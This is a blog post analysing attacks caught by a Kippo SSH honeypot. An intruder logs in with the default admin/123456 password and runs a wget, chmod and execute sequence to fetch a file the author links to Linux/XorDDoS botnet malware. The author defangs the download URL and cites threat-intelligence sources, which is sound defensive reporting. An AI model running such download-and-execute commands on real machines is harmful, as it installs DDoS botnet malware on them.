So I have had my kippo honeypot running for a while and got some pretty good statistics from it. But after a while I got bored and turned it all off.
I decided to fire it back up again and got some interesting hits from 184.108.40.206.
It seems to be trying to execute some Linux/XorDDOS malware according to the guys over at malwaremustdie.org.
“…. the post-infection of this malware made the infected machine to act as bot, remotely controlled for malicious process, config, deny IP, daemon and configurations. They are using XOR’ed encryption communication, processes are sent with md5 encoded beforehand. The main function of this malware ELF is for a stealth DDoS attacker botnet.”
As you can see from my SIEM this IP is on the OTX register and its known as malicious
Basic Info of this IP is:-
FIRST SEEN:Jan. 4, 2016, 8:31 am
LAST SEEN:Jan. 6, 2016, 7:26 am
So we can see on the SIEM its detected the hits coming in, I’ve allowed the connection to pass the firewall as its going into my DMZ on a specific port.
It connects to the default honeypot admin/123456 login and tries the following command
PATH=$PATH: /usr/local/sbin: usr/local/bin: /usr/sbin: /usr/bin: /sbin: /bin
wget hXXp://220.127.116.11/abf/f13 (i’ve edited it to say hXXP so there isnt a live link)
chmod +x f13
by doing this its trying to to download a file from
18.104.22.168. This IP belongs to a godaddy host. IOFLOD(dot)com
and the chmod +x to give it permissions to then ./f13 to execute it.
One thing to note is that none of this is detected in Kippo-Graph, it only registers the connection from the IP.
We then get a connection back again and the following commands are executed:-
“ls -la /var/run/gcc.pid”
This sounds very much like the malware they has been torn apart by MalwareMustDie.
The files are also picked up by VirusTotal
It seems to be trying to execute some Linux/XorDDOS malware according to the guys over at malwaremustdie.org